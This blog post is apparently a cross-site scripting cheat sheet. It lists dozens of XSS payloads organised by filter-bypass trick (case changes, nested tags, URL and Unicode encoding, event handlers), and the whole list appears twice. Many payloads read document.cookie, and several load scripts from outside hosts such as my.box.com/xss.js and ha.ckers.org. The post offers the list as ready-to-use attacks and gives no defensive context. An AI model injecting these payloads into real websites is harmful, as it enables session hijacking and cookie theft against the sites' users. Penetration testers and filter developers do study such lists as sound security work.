Basic XSS codes:
----------------------------------
<script>alert("XSS")</script>
<script>alert("XSS");</script>
<script>alert('XSS')</script>
"><script>alert("XSS")</script>
<script>alert(/XSS")</script>
<script>alert(/XSS/)</script>
When inside Script tag:
---------------------------------
</script><script>alert(1)</script>
‘; alert(1);
')alert(1);//
Bypassing with toggle case:
--------------------------------------
<ScRiPt>alert(1)</sCriPt>
<IMG SRC=jAVasCrIPt:alert('XSS')>
XSS in Image and HTML tags:
---------------------------------------------
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<img src=xss onerror=alert(1)>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
Bypass the script tag filtering:
--------------------------------------------------
<<SCRIPT>alert("XSS");//<</SCRIPT>
%253cscript%253ealert(1)%253c/script%253e
"><s"%2b"cript>alert(document.cookie)</script>
foo<script>alert(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt>
Using String.fromCharCode function:
-----------------------------------------------------
<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
“><script >alert(document.cookie)</script>
Bypass filter when it strips <script> tags:
%253cscript%253ealert(document.cookie)%253c/script%253e
“><s”%2b”cript>alert(document.cookie)</script>
“><ScRiPt>alert(document.cookie)</script>
“><<script>alert(document.cookie);//<</script>
foo<script>alert(document.cookie)</script>
<scr<script>ipt>alert(document.cookie)</scr</script>ipt>
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
When inside <script> tags:
‘; alert(document.cookie); var foo=’
foo\’; alert(document.cookie);//’;
</script><script >alert(document.cookie)</script>
Other XSS that don’t require <script>:
<img src=asdf onerror=alert(document.cookie)>
<BODY ONLOAD=alert(’XSS’)>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC=" javascript:alert('XSS');">
<iframe src=http://ha.ckers.org/scriptlet.html <
<SCRIPT SRC=//ha.ckers.org/.j>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG LOWSRC="javascript:alert('XSS')">
<BR SIZE="&{alert('XSS')}">
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
1) <a href="javascript:\u0061le%72t(1)"><button>
2) <div onmouseover='alert(1)'>DIV</div>
3) <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
4) <a href="jAvAsCrIpT:alert(1)">X</a>
5) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
6) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
7) <var onmouseover="prompt(1)">On Mouse Over</var>
8) <a href=javascript:alert(document.cookie)>Click Here</a>
9) <img src="/" =_=" title="onerror='prompt(1)'">
10) <%<!--'%><script>alert(1);</script -->
11) <script src="data:text/javascript,alert(1)"></script>
12) <iframe/src \/\/onload = prompt(1)
13) <iframe/onreadystatechange=alert(1)
14) <svg/onload=alert(1)
15) <input value=<><iframe/src=javascript:confirm(1)
16) <input type="text" value=``<div/onmouseover='alert(1)'>X</div>
17) http://www.<script>alert(1)</script .com
18) <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe>
19) <svg><script ?>alert(1)
20) <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
21) <img src=`xx:xx`onerror=alert(1)>
22) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
23) <meta http-equiv="refresh" content="0;javascript:alert(1)"/>
24) <math><a xlink:href="//jsfiddle.net/t846h/">click
25) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
26) <svg contentScriptType=text/vbs><script>MsgBox+1
27) <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
28) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
29) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
30) <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
31) <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
32) <object data=javascript:\u0061le%72t(1)>
33) <script>+-+-1-+-+alert(1)</script>
34) <body/onload=<!-->
alert(1)>
35) <script itworksinallbrowsers>/*<script* */alert(1)</script
36) <img src ?itworksonchrome?\/onerror = alert(1)
37) <svg><script>//
confirm(1);</script </svg>
38) <svg><script onlypossibleinopera:-)> alert(1)
39) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
40) <script x> alert(1) </script 1=2
41) <div/onmouseover='alert(1)'> style="x:">
42) <--`<img/src=` onerror=alert(1)> --!>
43) <script/src=data:text/javascript,alert(1)></script>
44) <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
45) "><img src=x onerror=window.open('https://www.google.com/');>
46) <form><button formaction=javascript:alert(1)>CLICKME
47) <math><a xlink:href="//jsfiddle.net/t846h/">click
48) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
49) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
50) <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
----------------------------------
<script>alert("XSS")</script>
<script>alert("XSS");</script>
<script>alert('XSS')</script>
"><script>alert("XSS")</script>
<script>alert(/XSS")</script>
<script>alert(/XSS/)</script>
When inside Script tag:
---------------------------------
</script><script>alert(1)</script>
‘; alert(1);
')alert(1);//
Bypassing with toggle case:
--------------------------------------
<ScRiPt>alert(1)</sCriPt>
<IMG SRC=jAVasCrIPt:alert('XSS')>
XSS in Image and HTML tags:
---------------------------------------------
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<img src=xss onerror=alert(1)>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
Bypass the script tag filtering:
--------------------------------------------------
<<SCRIPT>alert("XSS");//<</SCRIPT>
%253cscript%253ealert(1)%253c/script%253e
"><s"%2b"cript>alert(document.cookie)</script>
foo<script>alert(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt>
Using String.fromCharCode function:
-----------------------------------------------------
<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
“><script >alert(document.cookie)</script>
Bypass filter when it strips <script> tags:
%253cscript%253ealert(document.cookie)%253c/script%253e
“><s”%2b”cript>alert(document.cookie)</script>
“><ScRiPt>alert(document.cookie)</script>
“><<script>alert(document.cookie);//<</script>
foo<script>alert(document.cookie)</script>
<scr<script>ipt>alert(document.cookie)</scr</script>ipt>
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
When inside <script> tags:
‘; alert(document.cookie); var foo=’
foo\’; alert(document.cookie);//’;
</script><script >alert(document.cookie)</script>
Other XSS that don’t require <script>:
<img src=asdf onerror=alert(document.cookie)>
<BODY ONLOAD=alert(’XSS’)>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC=" javascript:alert('XSS');">
<iframe src=http://ha.ckers.org/scriptlet.html <
<SCRIPT SRC=//ha.ckers.org/.j>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG LOWSRC="javascript:alert('XSS')">
<BR SIZE="&{alert('XSS')}">
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
1) <a href="javascript:\u0061le%72t(1)"><button>
2) <div onmouseover='alert(1)'>DIV</div>
3) <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
4) <a href="jAvAsCrIpT:alert(1)">X</a>
5) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
6) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
7) <var onmouseover="prompt(1)">On Mouse Over</var>
8) <a href=javascript:alert(document.cookie)>Click Here</a>
9) <img src="/" =_=" title="onerror='prompt(1)'">
10) <%<!--'%><script>alert(1);</script -->
11) <script src="data:text/javascript,alert(1)"></script>
12) <iframe/src \/\/onload = prompt(1)
13) <iframe/onreadystatechange=alert(1)
14) <svg/onload=alert(1)
15) <input value=<><iframe/src=javascript:confirm(1)
16) <input type="text" value=``<div/onmouseover='alert(1)'>X</div>
17) http://www.<script>alert(1)</script .com
18) <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe>
19) <svg><script ?>alert(1)
20) <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
21) <img src=`xx:xx`onerror=alert(1)>
22) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
23) <meta http-equiv="refresh" content="0;javascript:alert(1)"/>
24) <math><a xlink:href="//jsfiddle.net/t846h/">click
25) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
26) <svg contentScriptType=text/vbs><script>MsgBox+1
27) <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
28) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
29) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
30) <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
31) <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
32) <object data=javascript:\u0061le%72t(1)>
33) <script>+-+-1-+-+alert(1)</script>
34) <body/onload=<!-->
alert(1)>
35) <script itworksinallbrowsers>/*<script* */alert(1)</script
36) <img src ?itworksonchrome?\/onerror = alert(1)
37) <svg><script>//
confirm(1);</script </svg>
38) <svg><script onlypossibleinopera:-)> alert(1)
39) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
40) <script x> alert(1) </script 1=2
41) <div/onmouseover='alert(1)'> style="x:">
42) <--`<img/src=` onerror=alert(1)> --!>
43) <script/src=data:text/javascript,alert(1)></script>
44) <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
45) "><img src=x onerror=window.open('https://www.google.com/');>
46) <form><button formaction=javascript:alert(1)>CLICKME
47) <math><a xlink:href="//jsfiddle.net/t846h/">click
48) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
49) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
50) <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
0 comments:
Post a Comment
please comment here...............